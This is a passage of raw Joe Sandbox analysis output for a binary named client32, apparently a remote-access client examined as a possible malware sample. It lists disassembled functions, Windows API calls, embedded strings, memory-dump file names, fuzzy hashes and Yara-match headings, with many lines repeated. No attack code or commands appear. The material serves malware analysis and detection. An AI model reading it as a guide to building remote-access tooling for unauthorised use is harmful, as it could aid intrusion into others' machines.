                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LoadStringwsprintf
                                                                                • String ID: #%d$..\ctl32\util.cpp$i < cchBuf
                                                                                • API String ID: 104907563-3240211118
                                                                                • Opcode ID: 188e66dcb4f495cccd276ddbe85c9828130f8f7e32c029e7730bc87656a10fbf
                                                                                • Instruction ID: 8140d2e7eee7513769b3ba4dad54de8c0dbe44583bb89c450ccda0d540df1705
                                                                                • Opcode Fuzzy Hash: 188e66dcb4f495cccd276ddbe85c9828130f8f7e32c029e7730bc87656a10fbf
                                                                                • Instruction Fuzzy Hash: 09F0F6BAA002267BDA008A99EC85DDFFB5CDF4469C7404025F908C7600EA30E800C7A9
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,11037F05), ref: 11145463
                                                                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11145475
                                                                                • FreeLibrary.KERNEL32(00000000,?,11037F05), ref: 11145485
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                • API String ID: 145871493-545709139
                                                                                • Opcode ID: d9714682fd572e4dd61365fd2dfa7814b888b2e8bab1e0a3a5dbf5644fcdd9a2
                                                                                • Instruction ID: e6235b5ae6f1dfca5c3043155b5dfa22c054f7606e96d7ad1ec578fde494cc77
                                                                                • Opcode Fuzzy Hash: d9714682fd572e4dd61365fd2dfa7814b888b2e8bab1e0a3a5dbf5644fcdd9a2
                                                                                • Instruction Fuzzy Hash: A1F0A7317021744FE3568AB69F84AAEFAD5EB81B7AB190135E430CAA98E73488408765
                                                                                APIs
                                                                                • IsWindow.USER32(00000000), ref: 110ED0D9
                                                                                • SendMessageA.USER32(00000000,0000045B,11020C43,00000000), ref: 110ED10D
                                                                                • SendMessageA.USER32(00000000,00000445,00000000,04000000), ref: 110ED11C
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$Send$ErrorExitLastProcessWindowwsprintf
                                                                                • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)
                                                                                • API String ID: 2446111109-1196874063
                                                                                • Opcode ID: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                                • Instruction ID: de22b858d700e942c4608c09a96d83abbd875fbcce216c0436bbd94e05821714
                                                                                • Opcode Fuzzy Hash: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                                • Instruction Fuzzy Hash: 75E0D82978027837D52176926C0AFDF7B5CCB85A55F058021FB15BB0C1D560730146ED
                                                                                APIs
                                                                                • FindWindowA.USER32(IPTip_Main_Window,00000000), ref: 11017428
                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 11017437
                                                                                • PostMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 11017458
                                                                                • SendMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 1101746B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessageWindow$FindLongPostSend
                                                                                • String ID: IPTip_Main_Window
                                                                                • API String ID: 3445528842-293399287
                                                                                • Opcode ID: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
                                                                                • Instruction ID: 34ac11834c9c2e389a15be58e88483fc622eca852c0d3e073bf1a838df65f62f
                                                                                • Opcode Fuzzy Hash: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
                                                                                • Instruction Fuzzy Hash: A6E0DF38AC1B7973F23916204E5AFCA79458B00B20F100150FB32BC9C98B9894009698
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,1B702977), ref: 11069909
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • LeaveCriticalSection.KERNEL32(?,?), ref: 110699DC
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 11069A07
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$Enter__wcstoi64
                                                                                • String ID: Buffers$Client
                                                                                • API String ID: 1723449611-673521604
                                                                                • Opcode ID: 112392cb66ba010ec287cafc200a02556091a92033b480183ab92ddcc4a2922c
                                                                                • Instruction ID: 6e52f73104c3b5384aab9ec7da9b21e4f26a08b532b87f3f1e7b4992386e0f41
                                                                                • Opcode Fuzzy Hash: 112392cb66ba010ec287cafc200a02556091a92033b480183ab92ddcc4a2922c
                                                                                • Instruction Fuzzy Hash: E1415A75A04209AFDB14CFA8C880B9EF7F9EF88704F20855DE515DB785DB75A901CB90
                                                                                APIs
                                                                                  • Part of subcall function 110CEDF0: EnterCriticalSection.KERNEL32(00000000,00000000,1B702977,00000000,00000000,00000000,110CF110,?,00000001), ref: 110CEE2A
                                                                                  • Part of subcall function 110CEDF0: LeaveCriticalSection.KERNEL32(00000000), ref: 110CEE92
                                                                                • IsWindow.USER32(?), ref: 110CF82B
                                                                                  • Part of subcall function 110CC330: GetCurrentThreadId.KERNEL32 ref: 110CC339
                                                                                • RemovePropA.USER32(?), ref: 110CF858
                                                                                • DeleteObject.GDI32(?), ref: 110CF86C
                                                                                • DeleteObject.GDI32(?), ref: 110CF876
                                                                                • DeleteObject.GDI32(?), ref: 110CF880
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeleteObject$CriticalSection$CurrentEnterLeavePropRemoveThreadWindow
                                                                                • String ID:
                                                                                • API String ID: 1921910413-0
                                                                                • Opcode ID: e7ee2ccd0990f0a239e7a4ad568e4e99a575b0a85c9cc50c84e6834965f63a82
                                                                                • Instruction ID: ad97ac124b8baf06b1bc187428558142c09e0612fd1a0aa1ed86d22d24e6cfad
                                                                                • Opcode Fuzzy Hash: e7ee2ccd0990f0a239e7a4ad568e4e99a575b0a85c9cc50c84e6834965f63a82
                                                                                • Instruction Fuzzy Hash: 0C316BB1A007559BDB20DF69D940B5BBBE8EB04B18F000A6DE862D3690D775E404CBA2
                                                                                APIs
                                                                                Strings
                                                                                • %02x, xrefs: 11081610
                                                                                • m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}, xrefs: 11081647
                                                                                • ..\CTL32\DataStream.cpp, xrefs: 1108165E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf
                                                                                • String ID: %02x$..\CTL32\DataStream.cpp$m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}
                                                                                • API String ID: 2111968516-476189988
                                                                                • Opcode ID: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
                                                                                • Instruction ID: 5a57582845b686d446ddd06a6d519ab032a036b4d7a2f4ef603709a16adc2e93
                                                                                • Opcode Fuzzy Hash: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
                                                                                • Instruction Fuzzy Hash: 8621F371E412599FDB24CF65DDC0EAAF3F8EF48304F0486AEE51A97940EA70AD44CB60
                                                                                APIs
                                                                                  • Part of subcall function 1111AAA0: DeleteObject.GDI32(?), ref: 1111AAD6
                                                                                • SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
                                                                                • SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
                                                                                • DeleteObject.GDI32(?), ref: 1111F4E4
                                                                                • DeleteObject.GDI32(?), ref: 1111F4F1
                                                                                • DeleteObject.GDI32(?), ref: 1111F516
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeleteObject$PaletteSelect
                                                                                • String ID:
                                                                                • API String ID: 2820294704-0
                                                                                • Opcode ID: 49a3d47807c6f92d38608e4a3b8e2f849b62ff86fa01972e32864b9cc0c423b5
                                                                                • Instruction ID: f40c181d7eb29f9f1a68c60cce03c48cde81027a9113fa9449142c78dfeb9332
                                                                                • Opcode Fuzzy Hash: 49a3d47807c6f92d38608e4a3b8e2f849b62ff86fa01972e32864b9cc0c423b5
                                                                                • Instruction Fuzzy Hash: 7B219076A04517ABD7049F78D9C46AAF7A8FB18318F11023AE91DDB204CB35BC558BD1
                                                                                APIs
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110259D7
                                                                                • GetDlgItem.USER32(?,00001399), ref: 11025A11
                                                                                • TranslateMessage.USER32(?), ref: 11025A2A
                                                                                • DispatchMessageA.USER32(?), ref: 11025A34
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11025A76
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$DispatchItemTranslate
                                                                                • String ID:
                                                                                • API String ID: 1381171329-0
                                                                                • Opcode ID: 00341069dc38fbb4dfc00e2e7f471a471adeab46effe85cccc881b86fc4bfeea
                                                                                • Instruction ID: 1d3eb3fe4f0069694488dcbc6a13b2e6f5653f41aef2ba1524fd952247bef68a
                                                                                • Opcode Fuzzy Hash: 00341069dc38fbb4dfc00e2e7f471a471adeab46effe85cccc881b86fc4bfeea
                                                                                • Instruction Fuzzy Hash: 9721D171E0030B5BE714DAA1CC85BEFB7E8AF44308F404029EA2797580FA75E401CB94
                                                                                APIs
                                                                                  • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CAB
                                                                                  • Part of subcall function 11034C90: SetForegroundWindow.USER32(?), ref: 11034CB5
                                                                                  • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CDF
                                                                                  • Part of subcall function 11034C90: Sleep.KERNEL32(00000032), ref: 11034CE9
                                                                                • Sleep.KERNEL32(00000032,LegalNoticeText,?,?,LegalNoticeCaption,?,?,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F191
                                                                                • GetLastError.KERNEL32(00000000,Global\Client32Provider,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F1DF
                                                                                • Sleep.KERNEL32(00000032,?,?,0000004A,00000000,?), ref: 1104F33D
                                                                                • Sleep.KERNEL32(00000032), ref: 1104F383
                                                                                Strings
                                                                                • error opening ipc lap %d to logon, e=%d, %s, xrefs: 1104F1E7
                                                                                • Global\Client32Provider, xrefs: 1104F1BB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep$EnumWindows$ErrorForegroundLastWindow
                                                                                • String ID: Global\Client32Provider$error opening ipc lap %d to logon, e=%d, %s
                                                                                • API String ID: 3682529815-1899068400
                                                                                • Opcode ID: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
                                                                                • Instruction ID: 6aab5bd338832a8b6cc9a825996d00e4c24ed17e7d33d91b3ba03cdb4d861036
                                                                                • Opcode Fuzzy Hash: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
                                                                                • Instruction Fuzzy Hash: BC212638D4425ACED715DBA4CD98BECB760EB9630AF2001FDD85A97590EF302A45CB12
                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 11163972
                                                                                  • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                  • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                  • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                • _free.LIBCMT ref: 11163985
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap_free_malloc
                                                                                • String ID:
                                                                                • API String ID: 1020059152-0
                                                                                • Opcode ID: 038951e35deccbe33e424bc6d0b6b01cb88aea4f76c9cdef2cbfb9def4edf244
                                                                                • Instruction ID: 99a0502aaeb7ade96a4deef53194f79690bd7c081ca6f8299ad08a7ab0eaa67e
                                                                                • Opcode Fuzzy Hash: 038951e35deccbe33e424bc6d0b6b01cb88aea4f76c9cdef2cbfb9def4edf244
                                                                                • Instruction Fuzzy Hash: 6D110837618637AADB121B74A808649FB9CAF843F8B214126E85D96140FEB2D460CF90
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0000002C,?,?,00000000,?,1104362F,?,?,?), ref: 110B395F
                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,?,00000000,?,1104362F,?,?,?), ref: 110B397E
                                                                                • GetSystemMetrics.USER32(0000004C), ref: 110B39A7
                                                                                • GetSystemMetrics.USER32(0000004D), ref: 110B39AD
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,1104362F,?,?,?), ref: 110B39DB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$LeaveMetricsSystem$Enter
                                                                                • String ID:
                                                                                • API String ID: 4125181052-0
                                                                                • Opcode ID: b61a3752badfb56f32cfb2deb03944f9272f81fb0acc9150a138a5a10ab5b813
                                                                                • Instruction ID: 2eabc0a5c64141517199ab689f696fc8c069b56ecca888d5095ec5d0d1156609
                                                                                • Opcode Fuzzy Hash: b61a3752badfb56f32cfb2deb03944f9272f81fb0acc9150a138a5a10ab5b813
                                                                                • Instruction Fuzzy Hash: 6F11B132600608DFD314CF79C9849AAFBE5FFD8314B20866ED51A87614EB72E806CB80
                                                                                APIs
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11091B1A
                                                                                  • Part of subcall function 110CD940: EnterCriticalSection.KERNEL32(00000000,00000000,76963760,00000000,7697A1D0,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
                                                                                  • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
                                                                                  • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
                                                                                  • Part of subcall function 110CD940: LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
                                                                                • TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093540,?,00000000,?,00000000), ref: 11091B47
                                                                                • TranslateMessage.USER32(?), ref: 11091B51
                                                                                • DispatchMessageA.USER32(?), ref: 11091B5B
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11091B6B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$CriticalSectionSendTranslate$AcceleratorDispatchEnterLeave
                                                                                • String ID:
                                                                                • API String ID: 754905447-0
                                                                                • Opcode ID: 36596b3fcd7649346ff41791d0d657cf133c8c9ccfa1a3f74e0687a191674282
                                                                                • Instruction ID: 5368b2b879de48b6c9ab70957daae04249f1b13f85d80b649f1e25af9e3021ba
                                                                                • Opcode Fuzzy Hash: 36596b3fcd7649346ff41791d0d657cf133c8c9ccfa1a3f74e0687a191674282
                                                                                • Instruction Fuzzy Hash: D901B172F4030FABE714DBA58C91FABB3ADEB84718F004568F628D6080F674E40587A4
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0000002C,?,?,?,1104697C,?,00000001), ref: 110B38DB
                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,?,?,1104697C,?,00000001), ref: 110B38FE
                                                                                • SetEvent.KERNEL32(?,?,?,?,1104697C,?,00000001), ref: 110B391A
                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,?,?,1104697C,?,00000001), ref: 110B3921
                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,?,?,1104697C,?,00000001), ref: 110B3937
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
